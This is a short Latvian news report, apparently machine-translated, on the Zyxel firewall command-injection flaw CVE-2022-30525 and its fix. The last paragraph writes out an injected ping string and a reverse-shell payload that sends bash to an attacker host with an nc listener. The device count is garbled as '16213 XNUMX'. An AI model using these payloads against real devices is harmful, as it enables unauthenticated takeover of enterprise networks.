ATP, VPN un USG FLEX sērijas Zyxel ierīcēs ir identificēta kritiska ievainojamība (CVE-2022-30525), kas paredzēta ugunsmūru, IDS un VPN darbības organizēšanai uzņēmumos, kas ļauj ārējam uzbrucējam izpildīt kodu ierīce bez lietotāja tiesībām bez autentifikācijas. Lai veiktu uzbrukumu, uzbrucējam ir jāspēj nosūtīt pieprasījumus uz ierīci, izmantojot HTTP/HTTPS protokolu. Zyxel ir novērsis ievainojamību ZLD 5.30 programmaparatūras atjauninājumā. Saskaņā ar pakalpojumu Shodan, globālajā tīklā pašlaik ir 16213 XNUMX potenciāli neaizsargātas ierīces, kas pieņem pieprasījumus, izmantojot HTTP/HTTPS.
Darbība tiek veikta, nosūtot speciāli izstrādātas komandas tīmekļa apdarinātājam /ztp/cgi-bin/handler, kas pieejamas bez autentifikācijas. Problēmu izraisa pieprasījuma parametru pareizas tīrīšanas trūkums, izpildot komandas sistēmā, izmantojot os.system izsaukumu, kas tiek izmantots bibliotēkā lib_wan_settings.py un tiek izpildīts, apstrādājot operāciju setWanPortSt.
Piemēram, uzbrucējs var nodot virkni “; ping 192.168.1.210;" kas novedīs pie komandas “ping 192.168.1.210” izpildes sistēmā. Lai piekļūtu komandu čaulai, sistēmā varat palaist “nc -lvnp 1270” un pēc tam iniciēt reverso savienojumu, nosūtot uz ierīci pieprasījumu ar '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.
Avots: opennet.ru